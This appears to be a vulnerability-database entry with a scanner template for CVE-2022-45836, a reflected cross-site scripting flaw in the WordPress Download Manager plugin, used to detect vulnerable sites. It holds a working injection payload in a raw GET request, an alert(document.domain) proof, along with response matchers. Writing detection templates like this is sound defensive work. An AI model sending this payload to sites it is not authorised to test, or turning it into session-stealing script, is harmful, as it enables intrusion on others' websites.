WordPress Download Manager <= 3.2.59 - Reflected XSS
CVE-2022-45836
Verified
Description
W3 Eden, Inc. Download Manager plugin <= 3.2.59 contains a reflected cross-site scripting caused by insufficient input sanitization, letting attackers execute scripts in the context of the victim's browser, exploit requires attacker to craft a malicious link.
Severity
High
Published Date
February 6, 2026
Template Author
shivam kamboj
CVE-2022-45836.yaml
id: CVE-2022-45836
info:
name: WordPress Download Manager <= 3.2.59 - Reflected XSS
author: Shivam Kamboj
severity: high
description: |
W3 Eden, Inc. Download Manager plugin <= 3.2.59 contains a reflected cross-site scripting caused by insufficient input sanitization, letting attackers execute scripts in the context of the victim's browser, exploit requires attacker to craft a malicious link.
impact: |
Attackers can execute arbitrary scripts in the victim's browser, potentially leading to session hijacking or defacement.
remediation: |
Update to the latest version of the plugin where the vulnerability is fixed.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-45836
- https://patchstack.com/database/wordpress/plugin/download-manager/vulnerability/wordpress-download-manager-plugin-3-2-59-reflected-cross-site-scripting-xss-vulnerability
metadata:
verified: true
max-request: 1
publicwww-query: "/plugins/download-manager/"
tags: cve,cve2022,wordpress,wp-plugin,xss,download-manager,wpdm,wp
http:
- raw:
- |
GET /?skw=%22%20onfocus%3D%22alert%28document.domain%29%22%20autofocus%3D%22 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "onfocus=\"alert(document.domain)\" autofocus=\"\"","download-manager")'
condition: and
# digest: 490a0046304402200e961cbee8f659b436f3492f91ce3d45078b6fb39f16a50a25e6661750f476e402201b61b88e683ec91d18efe40134510a034b3eab964c056e2434393e4f9a792b43:922c64590222798bb761d5b6d8e72950Remediation Steps
Update to the latest version of the plugin where the vulnerability is fixed.